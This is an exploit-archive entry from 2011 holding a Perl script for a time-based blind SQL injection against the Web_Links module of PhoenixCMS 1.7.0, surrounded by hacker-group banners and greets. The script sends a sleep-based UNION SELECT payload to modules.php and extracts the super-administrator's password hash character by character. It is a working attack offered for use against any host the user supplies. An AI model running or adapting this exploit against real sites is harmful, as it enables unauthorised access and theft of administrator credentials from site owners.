PhoenixCMS 1.7.0 Module(Web_Links) Blind SQL Injection

2011-05-09T00:00:00
ID 1337DAY-ID-16055
Type zdt
Reporter KedAns-Dz
Modified 2011-05-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#!/usr/bin/perl
system("cls");
sub logo() {
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                 | )(_o/  \o_)( | > [email protected]  |              1
1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0
0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@[email protected]{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                       0
0       (@           `--------` © 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0    PhoenixCMS 1.7.0 Module(Web_Links) Blind SQL Injection Exploit    1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
###
# Title : PhoenixCMS 1.7.0 Module(Web_Links) Remote Blind SQL Injection Exploit
# Author : KedAns-Dz
# E-mail : [email protected] | [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote Blind SQL Inj3cTi0n Exploit (via PERL)
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En
###

use strict;
use LWP::UserAgent;

sub Usage() {
        print "[+] Usage: perl ./$0 <host>\n";
        print "[+] Example: perl ./$0 http://www.site.com/ \n";
}
logo();
print "\n";
my $host = shift || die Usage() ;
$host .= "modules.php?name=Web_Links&l_op=Add&title=DZ&description=DZ";
my $attack = LWP::UserAgent->new;
my $pass = "";
$attack->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
my @charset  =  (45..57, 95..103);
print "[+] Trying to exploit the SQL Injection\n";

for (my $j = 1; $j <=32; $j++) {
	sleep(3);
	foreach (@charset) {
		sleep(2);
		print "[+] Now trying with $_ \n";
		my $before = time();
		my $resp = $attack->post($host,
		{ url => "'/**/UNION SELECT
IF(SUBSTRING(pwd,$j,1)=CHAR($_),sleep(6),null) FROM nuke_authors WHERE
radminsuper='1" },
		Referer => $host);
		my $after = time();
		if(int($after-$before)) {
			print "[+] Success with ".chr($_)."\n";
			$pass .= chr($_);
			last;
		}
	}
}
print "[+] MD5 Hash : $pass\n";

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... 
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org) 
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.09exploit.com * All Security and Exploits Webs ...
#================================================================================================



#  0day.today [2018-02-17]  #